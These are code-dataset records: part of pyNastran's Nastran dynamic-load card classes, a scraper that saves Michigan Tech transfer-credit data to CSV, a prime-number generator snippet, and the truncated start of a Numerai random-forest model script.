real or blank)\r\n self.delay = integer_double_or_blank(card, 3, 'delay')\r\n\r\n #: Defines the type of the dynamic excitation. (LOAD,DISP, VELO, ACCE)\r\n self.Type = integer_string_or_blank(card, 4, 'Type', 'LOAD')\r\n\r\n #: Identification number of TABLEDi entry that gives F(t). (Integer > 0)\r\n self.tid = integer(card, 5, 'tid')\r\n\r\n #: Factor for initial displacements of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.us0 = double_or_blank(card, 6, 'us0', 0.0)\r\n\r\n #: Factor for initial velocities of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.vs0 = double_or_blank(card, 7, 'vs0', 0.0)\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n else:\r\n msg = 'invalid TLOAD1 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 8, 'len(TLOAD1 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def cross_reference(self, model):\r\n if self.tid:\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def Tid(self):\r\n if self.tid == 0:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['TLOAD1', self.sid, self.exciteID, self.delay, self.Type,\r\n self.Tid(), self.us0, self.vs0]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n us0 = set_blank_if_default(self.us0, 0.0)\r\n vs0 = set_blank_if_default(self.vs0, 0.0)\r\n list_fields = ['TLOAD1', self.sid, self.exciteID, self.delay, self.Type,\r\n self.Tid(), us0, vs0]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass TLOAD2(TabularLoad):\r\n r\"\"\"\r\n Transient Response Dynamic Excitation, Form 1\r\n\r\n Defines a time-dependent dynamic load or enforced motion of the form:\r\n\r\n .. math::\r\n \\left\\{ P(t) \\right\\} = \\left\\{ A \\right\\} \\cdot F(t-\\tau)\r\n\r\n for use in transient response analysis.\r\n \"\"\"\r\n type = 'TLOAD2'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n #: load ID\r\n #: SID must be unique for all TLOAD1, TLOAD2, RLOAD1, RLOAD2, and ACSRCE entries.\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.delay = integer_or_blank(card, 3, 'delay', 0)\r\n\r\n #: Defines the type of the dynamic excitation. (Integer; character\r\n #: or blank; Default = 0)\r\n self.Type = integer_string_or_blank(card, 4, 'Type', 'LOAD')\r\n\r\n #: Time constant. (Real >= 0.0)\r\n self.T1 = double_or_blank(card, 5, 'T1', 0.0)\r\n #if self.delay == 0:\r\n #self.T1 = double_or_blank(card, 5, 'T1', 0.)\r\n #else:\r\n #self.T1 = blank(card, 5, 'T1')\r\n\r\n #: Time constant. (Real; T2 > T1)\r\n self.T2 = double_or_blank(card, 6, 'T2', self.T1)\r\n #: Frequency in cycles per unit time. (Real >= 0.0; Default = 0.0)\r\n self.frequency = double_or_blank(card, 7, 'frequency', 0.)\r\n #: Phase angle in degrees. (Real; Default = 0.0)\r\n self.phase = double_or_blank(card, 8, 'phase', 0.)\r\n #: Exponential coefficient. (Real; Default = 0.0)\r\n self.c = double_or_blank(card, 9, 'c', 0.)\r\n #: Growth coefficient. (Real; Default = 0.0)\r\n self.b = double_or_blank(card, 10, 'b', 0.)\r\n #: Factor for initial displacements of the enforced degrees-of-freedom.\r\n #: (Real; Default = 0.0)\r\n self.us0 = double_or_blank(card, 11, 'us0', 0.)\r\n #: Factor for initial velocities of the enforced degrees-of-freedom\r\n #: (Real; Default = 0.0)\r\n self.vs0 = double_or_blank(card, 12, 'vs0', 0.)\r\n\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n elif self.Type in [5, 6, 7, 12, 13]:\r\n pass\r\n else:\r\n msg = 'invalid TLOAD2 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 13, 'len(TLOAD2 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def cross_reference(self, model):\r\n pass\r\n # delay\r\n # exciteID\r\n\r\n def rawFields(self):\r\n list_fields = ['TLOAD2', self.sid, self.exciteID, self.delay, self.Type,\r\n self.T1, self.T2, self.frequency, self.phase, self.c, self.b,\r\n self.us0, self.vs0]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n frequency = set_blank_if_default(self.frequency, 0.0)\r\n phase = set_blank_if_default(self.phase, 0.0)\r\n c = set_blank_if_default(self.c, 0.0)\r\n b = set_blank_if_default(self.b, 0.0)\r\n\r\n us0 = set_blank_if_default(self.us0, 0.0)\r\n vs0 = set_blank_if_default(self.vs0, 0.0)\r\n list_fields = ['TLOAD2', self.sid, self.exciteID, self.delay, self.Type,\r\n self.T1, self.T2, frequency, phase, c, b, us0, vs0]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass RFORCE(Load):\r\n type = 'RFORCE'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.nid = integer_or_blank(card, 2, 'nid', 0)\r\n self.cid = integer_or_blank(card, 3, 'cid', 0)\r\n self.scale = double_or_blank(card, 4, 'scale', 1.)\r\n self.r1 = double_or_blank(card, 5, 'r1', 0.)\r\n self.r2 = double_or_blank(card, 6, 'r2', 0.)\r\n self.r3 = double_or_blank(card, 7, 'r3', 0.)\r\n self.method = integer_or_blank(card, 8, 'method', 1)\r\n self.racc = double_or_blank(card, 9, 'racc', 0.)\r\n self.mb = integer_or_blank(card, 10, 'mb', 0)\r\n self.idrf = integer_or_blank(card, 11, 'idrf', 0)\r\n assert len(card) <= 12, 'len(RFORCE card) = %i' % len(card)\r\n else:\r\n self.sid = data[0]\r\n print(\"RFORCE = %s\" % data)\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by RFORCE sid=%s' % self.sid\r\n if self.nid > 0:\r\n self.nid = model.Node(self.nid, msg=msg)\r\n self.cid = model.Coord(self.cid, msg=msg)\r\n\r\n def Nid(self):\r\n if isinstance(self.nid, int):\r\n return self.nid\r\n return self.nid.nid\r\n\r\n def Cid(self):\r\n if isinstance(self.cid, int):\r\n return self.cid\r\n return self.cid.cid\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def rawFields(self):\r\n list_fields = ['RFORCE', self.sid, self.Nid(), self.Cid(), self.scale,\r\n self.r1, self.r2, self.r3, self.method, self.racc,\r\n self.mb, self.idrf]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n #method = set_blank_if_default(self.method,1)\r\n racc = set_blank_if_default(self.racc, 0.)\r\n mb = set_blank_if_default(self.mb, 0)\r\n idrf = set_blank_if_default(self.idrf, 0)\r\n list_fields = ['RFORCE', self.sid, self.Nid(), self.Cid(), self.scale,\r\n self.r1, self.r2, self.r3, self.method, racc,\r\n mb, idrf]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n if size == 8:\r\n return self.comment() + print_card_8(card)\r\n return self.comment() + print_card_16(card)\r\n #return self.comment() + card_writer(card)\r\n\r\n\r\nclass RLOAD1(TabularLoad):\r\n r\"\"\"\r\n Defines a frequency-dependent dynamic load of the form\r\n for use in frequency response problems.\r\n\r\n .. math::\r\n \\left\\{ P(f) \\right\\} = \\left\\{A\\right\\} [ C(f)+iD(f)]\r\n e^{ i \\left\\{\\theta - 2 \\pi f \\tau \\right\\} }\r\n\r\n ::\r\n\r\n RLOAD1 SID EXCITEID DELAY DPHASE TC TD TYPE\r\n RLOAD1 5 3 1\r\n \"\"\"\r\n type = 'RLOAD1'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.delay = integer_double_or_blank(card, 3, 'delay')\r\n self.dphase = integer_double_or_blank(card, 4, 'dphase')\r\n self.tc = integer_or_blank(card, 5, 'tc', 0)\r\n self.td = integer_or_blank(card, 6, 'td', 0)\r\n self.Type = integer_string_or_blank(card, 7, 'Type', 'LOAD')\r\n\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n else:\r\n msg = 'invalid RLOAD1 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 8, 'len(RLOAD1 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by RLOAD1 sid=%s' % (self.sid)\r\n if self.tc:\r\n self.tc = model.Table(self.tc, msg=msg)\r\n if self.td:\r\n self.td = model.Table(self.td, msg=msg)\r\n\r\n #def LoadID(self, lid):\r\n #return self.Lid()\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def Tc(self):\r\n if self.tc == 0:\r\n return None\r\n elif isinstance(self.tc, int):\r\n return self.tc\r\n return self.tc.tid\r\n\r\n def Td(self):\r\n if self.td == 0:\r\n return None\r\n elif isinstance(self.td, int):\r\n return self.td\r\n return self.td.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['RLOAD1', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tc(), self.Td(), self.Type]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n Type = set_blank_if_default(self.Type, 'LOAD')\r\n list_fields = ['RLOAD1', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tc(), self.Td(), Type]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass RLOAD2(TabularLoad):\r\n r\"\"\"\r\n Defines a frequency-dependent dynamic load of the form\r\n for use in frequency response problems.\r\n\r\n .. math:: \\left\\{ P(f) \\right\\} = \\left\\{A\\right\\} * B(f)\r\n e^{ i \\left\\{ \\phi(f) + \\theta - 2 \\pi f \\tau \\right\\} }\r\n\r\n ::\r\n\r\n RLOAD2 SID EXCITEID DELAY DPHASE TB TP TYPE\r\n RLOAD2 5 3 1\r\n \"\"\"\r\n type = 'RLOAD2'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.delay = integer_double_or_blank(card, 3, 'delay')\r\n self.dphase = integer_double_or_blank(card, 4, 'dphase')\r\n self.tb = integer_or_blank(card, 5, 'tb', 0)\r\n self.tp = integer_or_blank(card, 6, 'tp', 0)\r\n self.Type = string_or_blank(card, 7, 'Type', 'LOAD')\r\n\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n else:\r\n msg = 'invalid RLOAD2 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 8, 'len(RLOAD2 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by RLOAD2=%s' % (self.sid)\r\n if self.tb:\r\n self.tb = model.Table(self.tb, msg=msg)\r\n if self.tp:\r\n self.tp = model.Table(self.tp, msg=msg)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n #def Lid(self):\r\n #return self.lid\r\n\r\n def LoadID(self):\r\n return self.sid\r\n\r\n def Tb(self):\r\n if self.tb == 0:\r\n return None\r\n elif isinstance(self.tb, int):\r\n return self.tb\r\n return self.tb.tid\r\n\r\n def Tp(self):\r\n if self.tp == 0:\r\n return None\r\n elif isinstance(self.tp, int):\r\n return self.tp\r\n return self.tp.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['RLOAD2', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tb(), self.Tp(), self.Type]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n Type = set_blank_if_default(self.Type, 0.0)\r\n list_fields = ['RLOAD2', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tb(), self.Tp(), Type]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass RandomLoad(BaseCard):\r\n def __init__(self, card, data):\r\n pass\r\n\r\n\r\nclass RANDPS(RandomLoad):\r\n r\"\"\"\r\n Power Spectral Density Specification\r\n\r\n Defines load set power spectral density factors for use in random analysis\r\n having the frequency dependent form:\r\n\r\n .. math:: S_{jk}(F) = (X+iY)G(F)\r\n \"\"\"\r\n type = 'RANDPS'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n #: Random analysis set identification number. (Integer > 0)\r\n #: Defined by RANDOM in the Case Control Deck.\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: Subcase identification number of the excited load set.\r\n #: (Integer > 0)\r\n self.j = integer(card, 2, 'j')\r\n\r\n #: Subcase identification number of the applied load set.\r\n #: (Integer >= 0; K >= J)\r\n self.k = integer(card, 3, 'k')\r\n\r\n #: Components of the complex number. (Real)\r\n self.x = double_or_blank(card, 4, 'x', 0.0)\r\n self.y = double_or_blank(card, 5, 'y', 0.0)\r\n #: Identification number of a TABRNDi entry that defines G(F).\r\n self.tid = integer_or_blank(card, 6, 'tid', 0)\r\n assert len(card) <= 7, 'len(RANDPS card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n if self.tid:\r\n msg = ' which is required by RANDPS sid=%s' % (self.sid)\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def Tid(self):\r\n if self.tid == 0:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['RANDPS', self.sid, self.j, self.k, self.x, self.y,\r\n self.Tid()]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n","sub_path":"pyNastran/bdf/cards/loads/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":28847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"462756268","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\n\nURL_Base = \"https://www.banweb.mtu.edu/owassb/mtu_transfer_detail.\"\nURL_State = URL_Base + \"P_TRNS_STATE\"\nURL_School = URL_Base + \"P_TRNS_SCHOOL\"\nURL_Transcript = URL_Base + \"P_TRNS_FULL\"\n\n\"\"\"\nCSV Order:\n Header:\n single line at top of csv.\n Data:\n In one line, csv delimited.\n transfering_state_code,transfering_state_name,\n transfering_college_code,transferring_college_name,\n transfering_subject,transfering_number,\n transfering_credits,MTU_class_name,\n MTU_subject,MTU_number,MTU_credits\n\"\"\"\n\n# Fun stats information\ntotal_bytes_transfered = 0\n\n\nclass Class_Object(object):\n\n \"\"\"\n Object containing relational information between transferable classes\n and MTU's counts for them.\n \"\"\"\n\n transfering_state_code = \"\"\n transfering_state_name = \"\"\n transfering_college_code = \"\"\n transferring_college_name = \"\"\n transfering_subject = \"\"\n transfering_number = \"\"\n transfering_credits = \"\"\n MTU_class_name = \"\"\n MTU_subject = \"\"\n MTU_number = \"\"\n MTU_credits = \"\"\n\n def __init__(\n self,\n transfering_state_code, transfering_state_name,\n transfering_college_code, transferring_college_name,\n transfering_subject, transfering_number,\n transfering_credits, MTU_class_name, MTU_subject,\n MTU_number, MTU_credits):\n \"\"\"\n Initializer for the Class_Object containing all data\n \"\"\"\n self.transfering_state_code = transfering_state_code\n self.transfering_state_name = transfering_state_name\n self.transfering_college_code = transfering_college_code\n self.transferring_college_name = transferring_college_name\n self.transfering_subject = transfering_subject\n self.transfering_number = transfering_number\n self.transfering_credits = transfering_credits\n self.MTU_class_name = MTU_class_name\n self.MTU_subject = MTU_subject\n self.MTU_number = MTU_number\n self.MTU_credits = MTU_credits\n\n def __str__(self):\n \"\"\"\n Converts Class_Object into a human readable string\n \"\"\"\n return (\"Transfering State Code: {}\\nTransfering State Name: {}\\n\"\n \"Transfering College Code: {}\\nTransfering College Name: {}\\n\"\n \"Transfering Subject: {}\\nTransfering Course Number: {}\\n\"\n \"Transfering Credits: {}\\nMTU Class Name: {}\\n\"\n \"MTU Subject: {}\\nMTU Course Number: {}\\nMTU Credits: {}\"\n ).format(\n self.transfering_state_code, self.transfering_state_name,\n self.transfering_college_code, self.transferring_college_name,\n self.transfering_subject, self.transfering_number,\n self.transfering_credits, self.MTU_class_name, self.MTU_subject,\n self.MTU_number, self.MTU_credits)\n\n def toCSV(self):\n \"\"\"\n Converts Class_Object to a CSV row entry with values quoted\n \"\"\"\n return '\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\"\\n'.format(\n self.transfering_state_code, self.transfering_state_name,\n self.transfering_college_code, self.transferring_college_name,\n self.transfering_subject, self.transfering_number,\n self.transfering_credits, self.MTU_class_name,\n self.MTU_subject, self.MTU_number, self.MTU_credits\n )\n\n def toDict(self):\n \"\"\"\n Converts Class_Object to a dictionary\n \"\"\"\n return {\n 'Transfering State Code': self.transfering_state_code,\n 'Transfering State Name': self.transfering_state_name,\n \"Transfering College Code\": self.transfering_college_code,\n \"Transfering College Name\": self.transferring_college_name,\n \"Transfering Subject\": self.transfering_subject,\n \"Transfering Course Number\": self.transfering_number,\n \"Transfering Credits\": self.transfering_credits,\n \"MTU Class Name\": self.MTU_class_name,\n \"MTU Subject\": self.MTU_subject,\n \"MTU Course Number\": self.MTU_number,\n \"MTU Credits\": self.MTU_credits\n }\n\n\nclass College_Object(object):\n\n \"\"\"\n Object containg relational information about a college, it's state\n and a list of it's classes.\n \"\"\"\n\n college_code = \"\"\n college_name = \"\"\n college_state_code = \"\"\n college_state_name = \"\"\n class_list = None\n\n def __init__(\n self, college_code, college_name, college_state_code,\n college_state_name):\n \"\"\"\n Initialization of a college Object\n \"\"\"\n self.college_code = college_code\n self.college_name = college_name\n self.college_state_code = college_state_code\n self.college_state_name = college_state_name\n self.class_list = list()\n\n def __str__(self):\n \"\"\"\n Prints a course to a human readable string\n \"\"\"\n return (\n \"College Code: {}\\nCollege Name: {}\\n\"\n \"State Code: {}\\nState Name: {}\\nClass List: [{}]\\n\"\n ).format(\n self.college_code, self.college_name,\n self.college_state_code, self.college_state_name,\n self.class_list\n )\n\n\nclass File_Utils(object):\n\n \"\"\"\n File utilities for writing and reading data from files\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Blank init\n \"\"\"\n\n def write_to_csv(self, class_obj_list, output_file_name):\n \"\"\"\n Writes the class_obj_list to a a value quoted CSV file\n\n :class_obj_list: Class Object list to get data from\n :output_file_name: Name of the file to write to\n\n :returns: None\n \"\"\"\n with open(output_file_name, 'w') as csv_file:\n field_names = [\n 'Transfering State Code', 'Transfering State Name',\n \"Transfering College Code\", \"Transfering College Name\",\n \"Transfering Subject\", \"Transfering Course Number\",\n \"Transfering Credits\", \"MTU Class Name\", \"MTU Subject\",\n \"MTU Course Number\", \"MTU Credits\"]\n writer = csv.DictWriter(csv_file, fieldnames=field_names,\n quoting=csv.QUOTE_ALL)\n\n writer.writeheader()\n for course in class_obj_list:\n writer.writerow(course.toDict())\n\n def read_from_csv(self, input_file_name):\n \"\"\"\n Reads a CSV file and outputs the contents\n\n :input_file_name: File to read from\n\n :returns: None\n \"\"\"\n with open(input_file_name) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n print('\"{}\"'.format('\", \"'.join(row)))\n\n def read_from_csv_to_Class_Obj_List(self, input_file_name):\n \"\"\"\n Reads from a file and returns a list of Class_Object's to rebuild data\n\n :input_file_name: File to read from\n\n :returns: A list of ClassObjects\n \"\"\"\n class_obj_list = list()\n with open(input_file_name) as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n new_class_obj = Class_Object(\n row['Transfering State Code'],\n row['Transfering State Name'],\n row[\"Transfering College Code\"],\n row[\"Transfering College Name\"],\n row[\"Transfering Subject\"],\n row[\"Transfering Course Number\"],\n row[\"Transfering Credits\"],\n row[\"MTU Class Name\"],\n row[\"MTU Subject\"],\n row[\"MTU Course Number\"],\n row[\"MTU Credits\"]\n )\n class_obj_list.append(new_class_obj)\n return class_obj_list\n\n\ndef get_state_mapping():\n \"\"\"\n Get a list of states from MTU's banweb course transfer database\n\n :returns: A Dictioary of State Codes with their State Value\n \"\"\"\n req = requests.get(URL_State)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, 'html5lib')\n content = soup.find(\"select\", {\"name\": \"state_code\"})\n options = content.select('option[value]')\n state_dict = dict()\n for item in options:\n state_dict.update({\n item.get(\"value\"): item.text.replace(\"\\n\", \"\")\n })\n return state_dict\n\n\ndef get_colleges_from_state(state_code):\n \"\"\"\n Gathers course data from the MTU Banweb database for the specified\n state and generates a dictionary of Colleges associated with a state\n\n :state_code: The code of the state to gather colleges from\n\n :returns: A Dictionary of college IDs with an associated College Name\n \"\"\"\n data = {\"state_code\": state_code}\n req = requests.post(URL_School, data)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, 'html5lib')\n content = soup.find(\"select\", {\"name\": \"SBGI_CODE\"})\n options = content.select('option[value]')\n college_dict = dict()\n for item in options:\n college_dict.update({\n item.get(\"value\"): item.text.replace(\"\\n\", \"\")\n })\n return college_dict\n\n\ndef get_courses_from_college(college_object_list):\n \"\"\"\n Gathers course data from the MTU Banweb database for the specified\n Colleges and stored it inside the associated College Objct\n\n :college_object_list: A list of College Objects to store data into\n\n :returns: None\n \"\"\"\n for college_obj in college_object_list:\n data = {\n \"SBGI_CODE\": college_obj.college_code,\n \"state\": college_obj.college_state_code\n }\n req = requests.post(URL_Transcript, data)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, \"html5lib\")\n # There's no IDs or classes for the tables only CSS padding\n # pray they never change the layout\n table = soup.table.table\n # DEBUG: strip out the CSS so I can actually read this\n for tag in table.findAll(True):\n for attribute in [\"bgcolor\", \"style\", \"nowrap\"]:\n del tag[attribute]\n table_rows = table.find_all('tr')\n # First two rows are just identifiers we don't care about\n for row in table_rows[2::]:\n table_columns = row.find_all('td')\n if len(table_columns) != 7:\n print(\"Following row was not of length 7 \\\n issues may occur, skipping. [{}]\".format(row))\n continue\n Oth_Subj = table_columns[0].find(text=True)\n Oth_Numb = table_columns[1].find(text=True)\n Oth_Cred = table_columns[2].find(text=True)\n MTU_Name = table_columns[3].find(text=True)\n MTU_Subj = table_columns[4].find(text=True)\n MTU_Numb = table_columns[5].find(text=True)\n MTU_Cred = table_columns[6].find(text=True)\n college_obj.class_list.append(\n Class_Object(\n college_obj.college_state_code,\n college_obj.college_state_name,\n college_obj.college_code,\n college_obj.college_name,\n Oth_Subj, Oth_Numb, Oth_Cred,\n MTU_Name, MTU_Subj, MTU_Numb, MTU_Cred\n )\n )\n return None\n\n\ndef get_college_object_list(state_mapping):\n \"\"\"\n Gathers a list of College Objects from MTU's Banweb database\n\n :state_mapping: A Dictionary of State Codes to State Names\n\n :returns: A list of College Objects\n \"\"\"\n college_obj_list = list()\n for state_code, state_name in state_mapping.items():\n colleges_from_state = get_colleges_from_state(state_code)\n for college_code, college_name in colleges_from_state.items():\n college_obj_list.append(\n College_Object(\n college_code, college_name,\n state_code, state_name\n )\n )\n return college_obj_list\n\n\ndef college_obj_list_to_class_obj_list(college_obj_list):\n \"\"\"\n Converts a compiled College Object list into a more flat and\n usable overall College Course List\n\n :college_obj_list: List of College Objects to parse from\n\n :returns: A List of Course Objects\n \"\"\"\n class_obj_list = list()\n for college_obj in college_obj_list:\n class_obj_list.extend(college_obj.class_list)\n return class_obj_list\n\n\ndef get_course_object_list():\n \"\"\"\n Gathers live data from the MTU Banweb DB for classes\n and stores it into a list of Course Objects\n\n :returns: List of Course Objects\n \"\"\"\n print(\"Acquiring state map\")\n state_mapping = get_state_mapping()\n print(\"Mapping colleges to states\")\n college_obj_list = get_college_object_list(state_mapping)\n print(\"Getting course data from colleges\")\n get_courses_from_college(college_obj_list)\n return college_obj_list_to_class_obj_list(college_obj_list)\n\n\ndef main():\n files = File_Utils()\n files.write_to_csv(get_course_object_list(), \"/tmp/writer.csv\")\n global total_bytes_transfered\n print(\"Bytes wasted: {}\".format(\n total_bytes_transfered))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"banwebScrape.py","file_name":"banwebScrape.py","file_ext":"py","file_size_in_byte":13711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"281963192","text":"import math\r\n\r\ndef is_prime(x):\r\n if x == 1:\r\n return False\r\n for i in range(2, int(math.sqrt(x)) + 1):\r\n if x % i == 0:\r\n return False\r\n return True\r\n\r\nlist1 = list(range(1, 100))\r\n# print(list1)\r\n\r\nit = (x for x in list1 if is_prime(x))\r\n\r\nprint(next(it))","sub_path":"midA/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"454242902","text":"# In this version of the algorithm we have to test three approaches changing the values of\n# n_estimators, and using autoencoders.\n# The first approach using these data give us n_estimators = [20, 30, 50, 100] a logloss of 0.692662, and confidence level of 91.67%\n# The second approach using these data give us n_estimators = [17, 31, 51, 101] a logloss of 0.692666 and confidence level of 91.7%\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import log_loss\nimport pandas as pd\nimport numpy as np\nimport time\nimport fcntl\n\nseed = 7\nnp.random.seed(seed)\nstart_time = time.time()\nprint('Start running..................')\ndatadir= './data/'\npredictions = \"./predictions/\"\nlogs = './logs/'\n\n\ntrain = pd.read_csv(datadir + \"numerai_training_data.csv\",header=0)\ntour = pd.read_csv(datadir + \"numerai_tournament_data.csv\",header=0)\nvalid = tour.loc[tour.data_type=='validation']\nfeature_cols = [f for f in train.columns if \"feature\" in f]\n# Configuration params for random forest algorithm, bags how many times the loop run on the data.\nbags=10\nseed=11\n# The number of estimators is the number of the trees in the random forest\nmodel = RandomForestClassifier(n_jobs=-1,max_depth=4,n_estimators=16)\nbagged_prediction = np.zeros(valid.shape[0])\nbagged_prediction_tour = np.zeros(tour.shape[0])\nn_estimators = [20, 30, 50, 100] # 4 different estimators\n# valid, train, test\nfor n in range(0,bags):\n print(\"number of bag:\", n)\n for n_est in n_estimators:\n # range([start], stop[, step])\n print(\"number of tree:\", n_est)\n model.set_params(n_estimators=n_est)\n model.fit(train[feature_cols].values,train.target.values)\n preds = model.predict_proba(valid[feature_cols])[:,1]\n preds_tour = model.predict_proba(tour[feature_cols])[:,1]\n bagged_prediction += preds\n bagged_prediction_tour += preds_tour\n\nprint(\"finishesd loop\")\nbagged_prediction/=bags*len(n_estimators)\nbagged_prediction_tour/=bags*len(n_estimators) # this is to upload it to the competetion\nprint(bagged_prediction)\nprint(\"Logloss: {}\".format(log_loss(valid.target,bagged_prediction)))\n\nvalid['pred'] = bagged_prediction\n\neras = valid.era.unique()\ngood_eras = 0\nfor era in eras:\n tmp = valid[ valid.era == era ]\n ll = log_loss( tmp.target, tmp.pred)\n is_good = ll < 0.693\n if is_good:\n good_eras += 1\n print(\"{} {} {:.2%} {}\".format( era, len( tmp ), ll, is_good))\n\nconsistency = good_eras / float( len( eras ))\nprint(\"\\nconsistency: {:.1%} ({}/{})\".format( consistency, good_eras, len( eras )))\n\nif consistency > 0.58:\n 